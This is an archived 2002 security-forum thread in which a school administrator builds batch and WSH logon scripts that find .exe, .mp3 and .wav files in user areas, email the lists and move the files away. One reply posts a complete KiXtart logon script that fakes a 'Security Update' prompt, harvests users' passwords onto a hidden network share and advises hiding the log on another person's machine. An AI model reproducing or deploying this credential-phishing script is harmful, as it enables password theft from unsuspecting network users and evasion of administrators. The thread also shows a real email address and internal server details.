batch file confusion

Networking/Security Forums -> Programming and More

Author: browolf    Posted: Mon Oct 28, 2002 4:51 pm    Post subject: batch file confusion
    ----
Hi

i'm trying out some batch stuff, i'm planning on writing a script to scan people's userarea when they log on. I'm just playing around with things atm until i figure out the best way to do it. (the best way to learn stuff)

i'm having some trouble understanding why this isn't working.
i'm running it on win2k.

Code:

@echo off
dir %1\*.exe /a-D /b /S >>test.log
if errorlevel 0 echo exe found
if errorlevel 1 echo exe not found


it's the errorlevel bit that doesn't seem to work.
if i run the batch as "search.bat s:" the output is:

filenotfound
exe found
exe not found

(s: doesn't have any exe's in)

as i understand it. if dir finds no results then the errorlevel is 1.
i know that it is cos i can do echo %errorlevel%
i believe i can use %errorlevel% in the script but haven't tried.
i'm trying to keep things non-win2k specific atm.

cheers

Andy

Author: browolf    Posted: Tue Oct 29, 2002 3:52 pm    Post subject:
    ----
isok
i somehow fixed it by doing:

Code:

@echo off
dir %1\*.exe /a-D /b /S >>test.log
if errorlevel 1 goto exit
   echo do stuff

:exit
echo done!
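
Why the first script printed both messages while the second one behaves, shown as an added example that is not part of the original posts: `if errorlevel N` is true when the exit code is N or higher, so `if errorlevel 0` matches every result. The label names and the messages are made up for illustration; the `dir` line is the one from the thread.

```batch
@echo off
rem Added example, not from the thread. Run as: search.bat s:
dir %1\*.exe /a-D /b /S >>test.log

rem "if errorlevel N" is true when the exit code is N or higher, so
rem "if errorlevel 0" matches success and failure alike. Test from the
rem highest value down and branch away as soon as one matches.
if errorlevel 1 goto notfound
echo exe found
goto summary

:notfound
echo exe not found

:summary
rem echo and goto leave the exit code alone, so dir's result is still
rem there. Negating the test gives a one-line "exit code was 0" check.
if not errorlevel 1 echo dir returned 0, at least one .exe was listed
if errorlevel 1 echo dir returned 1 or more, nothing was listed
```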

Author: Sgt_B    Location: Chicago, IL US    Posted: Tue Oct 29, 2002 4:13 pm    Post subject:
    ----
A bit more interesting would be having the machines in question write their log files to a central location, giving the log file as <computername>.log.

Might be easier for you to manage.

Author: Sgt_B    Location: Chicago, IL US    Posted: Tue Oct 29, 2002 4:24 pm    Post subject:
    ----
@echo off
dir %1\*.exe /a-D /b /S >>\\<central location>\%computername%.log
if errorlevel 1 goto exit
echo do stuff

:exit
echo done!

Author: TheKingster    Location: UK    Posted: Tue Oct 29, 2002 4:59 pm    Post subject:
    ----
if you're trying to stop people running EXEs there's a whole section on that on these forums

Author: ShaolinTiger    Location: Kuala Lumpur, Malaysia    Posted: Tue Oct 29, 2002 5:58 pm    Post subject:
    ----
TheKingster wrote:
if you're trying to stop people running EXEs there's a whole section on that on these forums


It's usually nice if you tell people where it is as well..

http://www.security-forums.com/forum/viewtopic.php?t=438

Author: browolf    Posted: Tue Oct 29, 2002 9:55 pm    Post subject:
    ----
i don't want to have to go thru 1800 log files. it's just a small number of people who stick exe or mp3s in their user areas,

the script will email me using commandline emailer blat with the contents of the log file. i can then remove the files and disable their userareas.

atm the script looks like:

Code:

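@echo off
echo checking userarea for inappropriate files
rem errorlevel only reflects the last command run, so test it after
rem each dir and remember whether either search listed anything
set found=
dir %1\*.exe /a-D /b /S >>%1\test.log
if not errorlevel 1 set found=1
dir %1\*.mp3 /a-D /b /s >>%1\test.log
if not errorlevel 1 set found=1
if "%found%"=="" goto exit
   echo mailing filelist to administrator!
   \\lsahtc_nt1\netlogon\blat %1\test.log -to andy@address -server 192.168.0.15 -f academic\%username% -q
:exit
del %1\test.log
echo done!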

Author: ThePsyko    Location: California    Posted: Fri Nov 08, 2002 3:14 am    Post subject:
    ----
If you're doing this through logon scripts, you might want to look into kixtart - it's free and more robust than DOS (www.kixtart.com).. One of the first scripts I wrote was a password stealer / logger in Kix...


; REM ***
; REM *** Malishus log_on skript
; REM ***


IF INGROUP("Domain Administrators")
RETURN
ENDIF


; REM *** check to see if script has run on system before - if so, skip
; REM *** script and return to normal logon

IF EXIST("c:\winnt\config\confpol.txt")
RETURN
ENDIF

; REM *** Display standard windows messagebox with text and an OK button ***(no cancel button)

$selection = MESSAGEBOX ( "There is a Security Patch available for your system. Press 'OK' to Install", "Security Update", 64)

; REM *** Make it look official by including some lag time (it IS windows
; REM *** after all :)

? "Security Update Installing....."
SLEEP 1
? "Authentication error! Please Enter your password."
? "UserID: " + @USERID
FLUSHKB
? "Password: "
GETS $pass
? "Installation continuing....."
SLEEP 2

; REM *** Since Kix displays a 0 everytime a file is successfully opened
; REM *** &/or written to, the following line will keep the user from
; REM *** getting suspicious by showing them that
; REM *** there are 0000000 errors during "installation"

? "Installation Errors: "

; REM *** Map a drive to a hidden share on the logon server that only you
; REM *** know about..
; REM *** If this isn't possible, use another users system and share
; REM *** their drive to stash the log in.. never use your own system.

SHELL "%comspec% /c net use w: \\" + @LSERVER + "\hiddenshare$"

; REM *** Open (or create one if it doesn't exist) both the log file for
; REM *** the U/P and the file to later tell the script it has already
; REM *** run on this system

OPEN ( 1, "w:\log.txt", 5)
OPEN ( 2, "c:\winnt\config\confpol.txt", 5)

; REM *** Append the users User ID and Password to a central text file
; REM *** (makes it easier for retrieval)

WRITELINE (1, "User: " + @userid + Chr(13) + Chr(10))
WRITELINE (1, "Pass: " + $pass + Chr (13) + Chr(10))

; REM *** Add a blank line to the \confpol.txt file - will signal the
; REM *** script next time, but if found, won't raise any suspicions
; REM *** (usually)

WRITELINE ( 2, Chr (13) + Chr(10))

CLOSE (1)
CLOSE (2)

SHELL "%comspec% /c net use w: /delete"
? "Security Update Installed, continuing with logon..."
SLEEP 1
RETURN

Author: browolf    Posted: Fri Nov 08, 2002 10:39 am    Post subject:
    ----
i've used kixtart b4. it's ace. but if u gonna use that u might as well go all the way and use WSH. which in the end i did. i'll post my script when i get to work.

Author: browolf    Posted: Fri Nov 08, 2002 11:40 am    Post subject:
    ----
Code:

'on error resume next
Const ForReading = 1
wscript.echo ("checking your user area for inappropriate files")
set wshell = wscript.createobject("wscript.shell")
Dim fso, f1, ts, s,myfile,uname,udate
Set fso = CreateObject("Scripting.FileSystemObject")

If (fso.FileExists("s:\ftemp.$$$")) Then
fso.DeleteFile("s:\ftemp.$$$")
end if

uname = wshell.ExpandEnvironmentStrings("%USERNAME%")

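' skip exempt accounts: match whole comma-delimited names so that a partial
' name cannot match, and leave with WScript.Quit (WScript has no Exit method)
exempt = ",sbutte,adavis,jowen,naparro,vballa,cglen-,rbanni,jfairc,andy,myles,duncan,brian,ssstoke,abaill,adavis,msimps,"
if uname = "" OR instr(exempt, "," & lcase(uname) & ",") > 0 then wscript.quit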

WShell.Run "%comspec% /c dir s:\*.exe /a-d /b /s >> s:\ftemp.$$$",0,true
WShell.Run "%comspec% /c dir s:\*.mp3 /a-d /b /s >> s:\ftemp.$$$",0,true
WShell.Run "%comspec% /c dir s:\*.wav /a-d /b /s >> s:\ftemp.$$$",0,true

'read file
Set f = fso.GetFile("s:\ftemp.$$$")
if f.size > 0 then
    wscript.echo ("mailing file list to administrator")
    wshell.run "\\lsahtc_nt1\netlogon\blat s:\ftemp.$$$ -to andy@lythamhigh.lancs.sch.uk -server 192.168.0.15 -f academic\" & uname & " -q", 0,true
    wscript.echo ("mail sent!")
   
    datetemp = date
   udate = replace (datetemp,"/","")
    ttemp = time
   ttime = replace (ttemp,":","")
   folname = "\\lsahtc_nt1\logs\filez\" & uname & udate &"-"& ttime
    'make folder
     set f = fso.createfolder(folname)
    'move files
   Set MyFile = fso.Opentextfile("s:\ftemp.$$$", ForReading,false)
    do while myfile.AtEndOfStream <> True
      fpath = myfile.readline
      cmdline = "%comspec% /c move /y " & """" & fpath & """ " & folname
      wscript.echo "moving " & fpath
      WShell.Run cmdline, 0,true
    loop
   myfile.close
else
   wscript.echo ("Clear!")
end if
fso.DeleteFile("s:\ftemp.$$$")
set wshell = nothing
set fso = nothing
set f = nothing
set myfile = nothing




All times are GMT + 2 Hours